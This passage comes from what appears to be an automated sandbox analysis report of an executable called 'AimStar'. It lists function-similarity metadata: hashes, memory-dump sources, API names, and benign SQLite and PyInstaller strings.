                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4791C062A4AA4196EBA4CE2594407797FA0FB44BD4F144634DF9D47BD4CF3CE4108B18
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                          • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                          • Instruction ID: 464900c6e3015259887501c3b5b433c8ee56b0ee9584e896a8ad368fe9974a98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5081D432D0CA0386F7647E258107278BAB8AB11768FD58075DA0987799CB2DFB0DC361
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                          • API String ID: 0-1505470444
                                                                                                                                                                                                                                          • Opcode ID: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
                                                                                                                                                                                                                                          • Instruction ID: a7828c91049563867f20f0d7fb4c3050bddc399469824536e22fc8cd61e9f7e4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB91A932A0AB81A5EB20DB25D4443A967A4FB45BF4F044336DABC073D5EF38E041CB14
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                          • API String ID: 0-3727861699
                                                                                                                                                                                                                                          • Opcode ID: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
                                                                                                                                                                                                                                          • Instruction ID: a4f7f851bc72d7d3c9697b40f1e219e0ec7e7d40baed133cacba07264b26e5f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11810462B0B2C5AAE7608B25D5807BE7BA0FB40BC4F044132DB8D87691DF3CE465C768
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                                          • API String ID: 2830847230-3459038510
                                                                                                                                                                                                                                          • Opcode ID: 4e173d063852160c4bc34922d03083878766ad66bf42146868f36adf735100ba
                                                                                                                                                                                                                                          • Instruction ID: 77539d5bd7f0d325ad300e9c7d6db4b218981f99bc7936fc72b8815812779c4a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e173d063852160c4bc34922d03083878766ad66bf42146868f36adf735100ba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A612863B4A6819ADB158F28A4442B9B7A2FB44BE4F444335DE6E433D1DF3DD846C314
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                          • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                          • Instruction ID: 379511426e0802ca37d905f95375c66f50c94902af67ff3ace30cf609d056aae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C51A032B1DA028AEB14BB15E045A39B399EB44BA8F904131DE4E87788DF7CF849C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                          • API String ID: 2830847230-3727861699
                                                                                                                                                                                                                                          • Opcode ID: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
                                                                                                                                                                                                                                          • Instruction ID: 187dd00be2ec043fb641199bd8bf4e0e9575ad61c50d30194fcaa2847a3d2435
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5651ED3270ABC095CB10CB19E4846AEBBA5F748BC4F55813AEA8E03755DF3CD465C718
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                          • API String ID: 2830847230-2410398255
                                                                                                                                                                                                                                          • Opcode ID: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
                                                                                                                                                                                                                                          • Instruction ID: a27a3c2bf13112e76daad58e4d34935e8e58faae85b08be5ec2379a7a282ff3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB610466B4A69292E714DB26D14027E6BA0FF85BD4F140032EF9D07B95DF3CE891C724
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                          • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                          • Instruction ID: d7b9e28e7a0e7b2975c61d2e3997b38a28892beba2a6ee702c2072cdadd8c5f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC51B03290CA828AEB64AF21D049A79B7A8EB54BA4F984135DE4C87795CF3CF458C711
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                          • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                          • Instruction ID: a49e2157a4be6dee654568926976af875951c6a0edfb77c0dfb56b29a5198339
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D861A13290CBC585D720AB15E441BAAB7A4FB847A8F444225EF9C43B95DF7CE198CB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                                          • API String ID: 2830847230-2916047017
                                                                                                                                                                                                                                          • Opcode ID: 49fff31b694db0a63015b8c7494567ef428984a6d1a14628475fa2fe61a8c8d4
                                                                                                                                                                                                                                          • Instruction ID: 3972f4dc1b7f2ee36aec4bc1e3d56c297d09a6f0fc9ad3a33158cfc8670bbeed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49fff31b694db0a63015b8c7494567ef428984a6d1a14628475fa2fe61a8c8d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0151E132B5A242A6EB68CE25D044B3A23A1FB04BE0F466671CE3D473C5DF3CE8518764
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416933625.00007FF8A8151000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8150000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416884251.00007FF8A8150000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A819A000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81A8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81FC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81FF000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417270701.00007FF8A8200000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8150000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C6126570
                                                                                                                                                                                                                                          • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                          • API String ID: 800424832-87138338
                                                                                                                                                                                                                                          • Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                          • Instruction ID: 7f270b33b523d83db54dc06ba8366ae6cdcc79d610be9ea9dd67008049392e12
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D411573B0E74296E7298F18E4442697751FB90BE0F446230EAAE47AD9DF3CE501CB54
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: $%!.15g$-
                                                                                                                                                                                                                                          • API String ID: 2830847230-875264902
                                                                                                                                                                                                                                          • Opcode ID: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
                                                                                                                                                                                                                                          • Instruction ID: 7e0870bb9616358646f79a214f2fb89a6eda6894f2a1bbec716446c17d27c718
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4412462E1E78596EB10CB2EE0417AABBA0FB967C0F004135EE9E0779ACB3DD405C714
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,?,00007FF710F4352C,?,00000000,00007FF710F43F23), ref: 00007FF710F47F22
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                                                                                                          • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                          • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                          • Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                                          • Instruction ID: 18c38e9a56cf858a10be994ae8134691fda7f0acf0bd8851e5c1fdb8a95aab21
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F931C73171DEC145EA21AB11A851BEAA358FB84BF4F841231EE6D837C9DE3CE649C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                          • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                          • Instruction ID: b86ce9edf358cc3c53d4e31c833100a08ef38be6bc03ab033478483f9f9ff6e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81219F72B1CF4182E650EB14B4467AAB3A8FB88794F800136EE8D97756DE3CE249C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
